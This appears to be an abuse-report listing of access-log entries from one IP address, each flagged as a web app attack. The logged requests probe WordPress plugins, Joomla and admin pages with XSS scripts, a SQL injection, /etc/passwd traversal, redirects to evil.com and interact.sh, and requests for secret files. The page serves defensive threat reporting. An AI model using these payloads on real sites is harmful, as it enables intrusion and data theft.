Falco
03 Feb 2023
194.163.147.132 - - [03/Feb/2023:10:41:03 +0100] "GET /wp-content/plugins/vr-calendar-sync/assets/js ... show more 194.163.147.132 - - [03/Feb/2023:10:41:03 +0100] "GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:10:42:47 +0100] "GET /user HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:10:44:06 +0100] "POST /wp-login.php?wlcms-action=preview HTTP/1.1" 404 5282 "-" "-"
... show less
Web App Attack
Falco
03 Feb 2023
194.163.147.132 - - [03/Feb/2023:10:20:35 +0100] "GET /wp-content/plugins/anti-plagiarism/js.php?m=% ... show more 194.163.147.132 - - [03/Feb/2023:10:20:35 +0100] "GET /wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:10:25:10 +0100] "POST /admin/asign-single-student-subjects.php HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:10:29:00 +0100] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 404 5282 "-" "-"
... show less
Web App Attack
Falco
03 Feb 2023
194.163.147.132 - - [03/Feb/2023:09:59:07 +0100] "GET /wp-content/themes/Grimag/go.php?https://inter ... show more 194.163.147.132 - - [03/Feb/2023:09:59:07 +0100] "GET /wp-content/themes/Grimag/go.php?https://interact.sh HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:10:06:14 +0100] "GET /wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:10:08:30 +0100] "GET /wp-content/plugins/activehelper-livehelp/server/offline.php?BCC=BCC&COMPANY=COMPANY&COMPLETE=COMPLETE&DOMAINID=DOMAINID&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&PHONE=PHONE&SECURITY=SECURITY&SERVER=SERVER&TITLE=TITLE&URL=URL HTTP/1.1" 404 5282 "-" "-"
... show less
Web App Attack
Falco
03 Feb 2023
194.163.147.132 - - [03/Feb/2023:09:39:29 +0100] "POST /wp-content/plugins/seo-local-rank/admin/vend ... show more 194.163.147.132 - - [03/Feb/2023:09:39:29 +0100] "POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:09:40:04 +0100] "GET /wp-content/uploads/wpdm-cache/ HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:09:51:45 +0100] "GET /wp-content/plugins/wpmudev-updates/keys/ HTTP/1.1" 404 5282 "-" "-"
... show less
Web App Attack
Falco
03 Feb 2023
194.163.147.132 - - [03/Feb/2023:09:25:59 +0100] "GET /wp-content/plugins/indexisto/assets/js/indexi ... show more 194.163.147.132 - - [03/Feb/2023:09:25:59 +0100] "GET /wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:09:34:09 +0100] "POST /admin/ajax.php?action=login HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:09:34:12 +0100] "GET /admin/view_car.php?id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1" 404 5282 "-" "-"
... show less
Web App Attack
Falco
03 Feb 2023
194.163.147.132 - - [03/Feb/2023:09:09:02 +0100] "GET /wp-content/plugins/wp-easycart/inc/admin/phpi ... show more 194.163.147.132 - - [03/Feb/2023:09:09:02 +0100] "GET /wp-content/plugins/wp-easycart/inc/admin/phpinfo.php HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:09:15:46 +0100] "GET /user_secrets.yml HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:09:15:49 +0100] "GET /user_secrets.yml.old HTTP/1.1" 404 5282 "-" "-"
... show less
Web App Attack
Falco
03 Feb 2023
194.163.147.132 - - [03/Feb/2023:08:48:08 +0100] "GET /phpmyadmin/setup/index.php?id=%22%3e%3C%2Fscr ... show more 194.163.147.132 - - [03/Feb/2023:08:48:08 +0100] "GET /phpmyadmin/setup/index.php?id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mode=test&page=servers HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:08:51:34 +0100] "GET /phpmyadmin/index.php?db=information_schema HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:08:55:38 +0100] "GET /admin/user.php HTTP/1.1" 404 5282 "-" "-"
... show less
Web App Attack
Falco
03 Feb 2023
194.163.147.132 - - [03/Feb/2023:08:36:30 +0100] "POST /admin/index.php HTTP/1.1" 404 5282 "-" "-"<b ... show more 194.163.147.132 - - [03/Feb/2023:08:36:30 +0100] "POST /admin/index.php HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:08:36:34 +0100] "GET /admin/dashboard.php HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:08:38:34 +0100] "GET /wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb HTTP/1.1" 404 5282 "-" "-"
... show less
Web App Attack
Falco
03 Feb 2023
194.163.147.132 - - [03/Feb/2023:08:14:02 +0100] "GET /wp-content/plugins/webp-converter-for-media/i ... show more 194.163.147.132 - - [03/Feb/2023:08:14:02 +0100] "GET /wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://evil.com HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:08:17:34 +0100] "GET /user/sso_login?rurl=javascript:alert(document.domain) HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:08:17:37 +0100] "GET /user/sso_login?url=javascript:alert(document.domain) HTTP/1.1" 404 523 "-" "-"
... show less
Web App Attack
Falco
03 Feb 2023
194.163.147.132 - - [03/Feb/2023:07:38:19 +0100] "GET /administrator/components/com_joomla-visites/c ... show more 194.163.147.132 - - [03/Feb/2023:07:38:19 +0100] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:07:41:49 +0100] "GET /wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:07:45:08 +0100] "GET /wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 5282 "-" "-"
... show less
Web App Attack
Falco
03 Feb 2023
194.163.147.132 - - [03/Feb/2023:07:20:24 +0100] "GET /admin/data/autosuggest-remote.php?q=\"><img%2 ... show more 194.163.147.132 - - [03/Feb/2023:07:20:24 +0100] "GET /admin/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)> HTTP/1.1" 404 523 "-" "-"
194.163.147.132 - - [03/Feb/2023:07:25:02 +0100] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:07:25:06 +0100] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 404 5282 "-" "-"
... show less
Web App Attack
Falco
03 Feb 2023
194.163.147.132 - - [03/Feb/2023:06:58:30 +0100] "GET /wp-content/plugins/hdw-tube/mychannel.php?cha ... show more 194.163.147.132 - - [03/Feb/2023:06:58:30 +0100] "GET /wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:07:08:45 +0100] "GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:07:08:50 +0100] "GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1" 404 5282 "-" "-"
... show less
Web App Attack
Falco
03 Feb 2023
194.163.147.132 - - [03/Feb/2023:06:29:16 +0100] "GET /wp-content/plugins/heat-trackr/heat-trackr_ab ... show more 194.163.147.132 - - [03/Feb/2023:06:29:16 +0100] "GET /wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:06:37:48 +0100] "GET /wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:06:38:14 +0100] "GET /wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 5282 "-" "-"
... show less
Web App Attack
Falco
03 Feb 2023
194.163.147.132 - - [03/Feb/2023:06:07:01 +0100] "GET /wp-content/plugins/correos-express/log/log_re ... show more 194.163.147.132 - - [03/Feb/2023:06:07:01 +0100] "GET /wp-content/plugins/correos-express/log/log_rest.txt HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:06:09:20 +0100] "GET /wp-content/uploads/mc4wp-debug.log HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:06:18:32 +0100] "GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1" 404 5282 "-" "-"
... show less
Web App Attack
Falco
03 Feb 2023
194.163.147.132 - - [03/Feb/2023:05:33:20 +0100] "GET /admin/elfinder/elfinder-cke.html HTTP/1.1" 40 ... show more 194.163.147.132 - - [03/Feb/2023:05:33:20 +0100] "GET /admin/elfinder/elfinder-cke.html HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:05:43:17 +0100] "POST /admin/?a=doExportPack&c=language_general&n=language HTTP/1.1" 404 5282 "-" "-"
194.163.147.132 - - [03/Feb/2023:05:46:30 +0100] "GET /admin/ HTTP/1.1" 404 5282 "-" "-"
... show less
Web App Attack